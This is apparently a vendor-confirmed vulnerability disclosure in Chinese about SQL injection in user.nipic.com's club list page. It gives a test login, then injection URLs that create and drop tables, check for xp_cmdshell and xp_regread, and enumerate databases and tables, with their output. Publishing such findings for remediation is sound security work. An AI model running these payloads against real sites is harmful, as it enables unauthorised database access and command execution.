2014-04-14: 细节已通知厂商并且等待厂商处理中
2014-04-14: 厂商已经确认,细节仅向厂商公开
2014-04-24: 细节向核心白帽子及相关领域专家公开
2014-05-04: 细节向普通白帽子公开
2014-05-14: 细节向实习白帽子公开
2014-05-29: 细节向公众公开
SQL注入
过滤不严,存在SQL注入
使用
测试账号rainboyhi
测试密码rainboyhi
登录后访问
http://user.nipic.com/club/list.asp?id=12 存在注入
//创建一个临时表
http://user.nipic.com/club/list.asp?id=12;create table test2 (dstr nvarchar(3000));--
//判断创建是否成功
http://user.nipic.com/club/list.asp?id=12 and exists(select * from test2);--
//测试一下删除表
http://user.nipic.com/club/list.asp?id=12;drop table test2;--
检测XP_CMDSHELL(CMD命令):
http://user.nipic.com/club/list.asp?id=12 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')
测试OK
检测XP_REGREAD(注册表读取功能):
http://user.nipic.com/club/list.asp?id=12 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')
测试OK
//测试字段数
http://user.nipic.com/club/list.asp?id=12 order by 22;--
总共22个字段
//获取所有数据库
http://user.nipic.com/club/list.asp?id=12 and 2<1 union select 1,2,3,4,5,name,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21 from master.dbo.sysdatabases;--
master
tempdb
model
msdb
ReportServer
ReportServerTempDB
NipicClub
UserLogin
NipicClub库所有表
http://user.nipic.com/club/list.asp?id=12 and 2<1 union select id,2,3,4,5,name,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21 from NipicClub.dbo.sysobjects where xtype='U';--
所有表
az_bbs
az_bbs_good
az_bbs_re
sysdiagrams
test
你懂得
危害等级:高
漏洞Rank:10
确认时间:2014-04-14 13:39
感谢@Rain ,这个是我们老的社区程序
暂无